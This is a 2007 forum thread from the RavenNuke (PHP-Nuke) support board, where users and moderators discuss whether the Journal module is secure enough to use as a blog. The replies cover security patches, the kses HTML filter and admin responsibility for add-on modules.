Ravens PHP Scripts: Forums
 

 

View next topic
View previous topic
This forum is locked: you cannot post, reply to, or edit topics.   This topic is locked: you cannot edit posts or make replies.    Ravens PHP Scripts And Web Hosting Forum Index -> Raven's RavenNuke(tm) v2.00.00 - v2.02.00 Distro
Author Message
valdarez
Worker
Worker


Joined: Jan 22, 2007
Posts: 104

PostPosted: Tue Feb 13, 2007 5:28 pm Reply with quote

When I first installed Nuke on version 7.5 I read several posts that indicated I should disable the Journal due to security vulnerabilities. Is that still the case for version 7.6, or more importantly, for the RavenNuke 2.02.02 distro? I would like to add some type of 'blog' feature for the website and the Journal seems the natural choice. (I'm open to other alternatives whether free or commercial)

Edit: Junk, wrong forum. Can someone move this to the 2.02.02 forum please?
 
View user's profile Send private message
fkelly
Former Moderator in Good Standing


Joined: Aug 30, 2005
Posts: 3312
Location: near Albany NY

PostPosted: Tue Feb 13, 2007 7:08 pm Reply with quote

I don't know what the security vulnerabilities are with Journal and I've never used it so I can't address the first part of your question. I do know that I'd probably wait just a bit for 2.10 before implementing new features.

On the blog, what I did on the site I'm webmaster for was to create a new news story category called "blog". Then if a user wants a blog he can just submit news and you can classify the article under blog. As long as the story is not associated with the "article" category you have the option to not show it on the home page. So, if a user writes a series of "blog" entries you can just put the most recent one on the home page and have the rest in the stories archive. Then if you click on blog you'll see all the articles in that category. Occurs to me as I'm typing that you could also create categories like blog_user1, blog_user2 if you wanted to keep them separate.

This may not be what you want, I just throw it out as an idea.
 
View user's profile Send private message Visit poster's website
montego
Site Admin


Joined: Aug 29, 2004
Posts: 9449
Location: Arizona

PostPosted: Tue Feb 13, 2007 11:23 pm Reply with quote

valdarez, unfortunately I am not sure. My "gut" tells me "yes" because the upcoming 2.10.00 release has ALL the latest patches and kguske did some work, I think, to straighten out the editor, but I am not sure any of us could say anything is 100%... we are ALL humor and "to err is human".

_________________
Only registered users can see links on this board! Get registered or login!
Only registered users can see links on this board! Get registered or login! 
View user's profile Send private message Visit poster's website
valdarez
PostPosted: Tue Feb 13, 2007 11:59 pm Reply with quote

montego wrote:
valdarez, unfortunately I am not sure. My "gut" tells me "yes" because the upcoming 2.10.00 release has ALL the latest patches and kguske did some work, I think, to straighten out the editor, but I am not sure any of us could say anything is 100%... we are ALL humor and "to err is human".
Was the humor typo a freudian slip to prove your error point? Smile
 
montego
PostPosted: Wed Feb 14, 2007 12:21 am Reply with quote

You will never know for sure... killing me
 
kguske
Site Admin


Joined: Jun 04, 2004
Posts: 6383

PostPosted: Wed Feb 14, 2007 6:53 am Reply with quote

The changes we made were to address the use of a kses filter class that sixonetonoffun added to increase security. Since we were using kses for nukeWYSIWYG, we had to resolve the conflict. Even though I did not test it for security, I believe six did.

_________________
I google, therefore I exist...
Only registered users can see links on this board! Get registered or login!
 
View user's profile Send private message
valdarez
PostPosted: Fri Feb 16, 2007 3:26 pm Reply with quote

It's my understanding that Raven is meant to be an extremely secure release of the PHPNuke code base. That would lead me to believe all built in module's should be inherently secure if all of the patches are up to date. There doesn't seem to be any patches for the Journal. It just worries me that it supports HTML and I have read several security posts/threads warning to disable all HTML in PHPNuke. It sounds like you guys are giving it a tentative 'I think it's secure' endorsement?
 
Guardian2003
Site Admin


Joined: Aug 28, 2003
Posts: 6792
Location: Ha Noi, Viet Nam

PostPosted: Fri Feb 16, 2007 5:36 pm Reply with quote

On the other side of the coin, I have heard of no reports where a successful exploit was performed using the Journal module where the FCK WYSIWYG is integrated. But whatever you decide, unless you want tons of spam, ensure the module access is set for registered users at the minimum.
 
View user's profile Send private message Send e-mail
kguske
PostPosted: Fri Feb 16, 2007 10:14 pm Reply with quote

Your understanding is correct - at least the first part. RavenNuke has the latest security patches, NukeSentinel and more, which make it more secure than standard, unpatched Nuke distributions. With nukeWYSIWYG (specifically, the kses HTML filter class), it is much more than Nuke 7.7 and higher where HTML checking was basically disabled.

The version of the Journal module included in RavenNuke, though hardly used and not as thoroughly tested as other modules, was enhanced by Sixonetonoffun to use the kses filter class (among other things), in addition to the other security enhancements included in RavenNuke (mainly NukeSentinel) that protect all modules.

Does that mean we certify this module to be secure and protected from any and all attacks and configuration, shall we say, mistakes? Of course not. Security is a journey - not a destination. People will come up with new ways to circumvent or break built in protections, and we must be vigilant in identifying and addressing those issues.

In short, if I were using an unpatched distribution without NukeSentinel and an HTML filter class / function like kses (there are other good options, too), I would disable all HTML. Then again, even that wouldn't fully protect the site. But with with all the enhancements and testing done on RN, you should be significantly less likely to have a successful attack using the Journal module. Clear as mud? Smile
 
montego
PostPosted: Sat Feb 17, 2007 9:02 am Reply with quote

And, one additional comment, and NOT to take away from kguske's excellent response because this is just a general cautionary note! Just because you have NukeSentinel and the new kses, this does NOT protect you when you install poorly written add-on modules and hacks. This is why it is each admin's responsibility to know what they are installing and take personal resonsibility for it. That is what OpenSource / free is all about.. the responsibility lies with YOU.

Regards,
montego
 
valdarez
PostPosted: Sat Feb 17, 2007 11:45 am Reply with quote

montego wrote:
And, one additional comment, and NOT to take away from kguske's excellent response because this is just a general cautionary note! Just because you have NukeSentinel and the new kses, this does NOT protect you when you install poorly written add-on modules and hacks. This is why it is each admin's responsibility to know what they are installing and take personal resonsibility for it. That is what OpenSource / free is all about.. the responsibility lies with YOU.

Regards,
montego
Understood monetgo. I only had other nodes installed when the site was first hacked, Shoutcast and the Donations node. I failed to keep the forums up to date. I think the first time it was hacked we were on the .07 patch, when .13 was available, and this last time we were hacked I was on the .13 patch when .22 was available. A really nice to have feature that could be added to a future version of phpnuke is the ability for phpnuke to check for new patches/version of the various modules and send an email to the administrator.

In regards to the filder class / nukeWYSIWYG editor. Is it disabled by default? I have the Journal running so the Administrator can view it and it's just using the stanard editor.
 
jakec
Site Admin


Joined: Feb 06, 2006
Posts: 3048
Location: United Kingdom

PostPosted: Sun Feb 18, 2007 8:33 am Reply with quote

nukeWYSIWYG is not integrated with the Journal module in 2.02.02, but it will be in the new 2.10.0.
 
View user's profile Send private message
Display posts from previous:       
This forum is locked: you cannot post, reply to, or edit topics.   This topic is locked: you cannot edit posts or make replies.    Ravens PHP Scripts And Web Hosting Forum Index -> Raven's RavenNuke(tm) v2.00.00 - v2.02.00 Distro

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©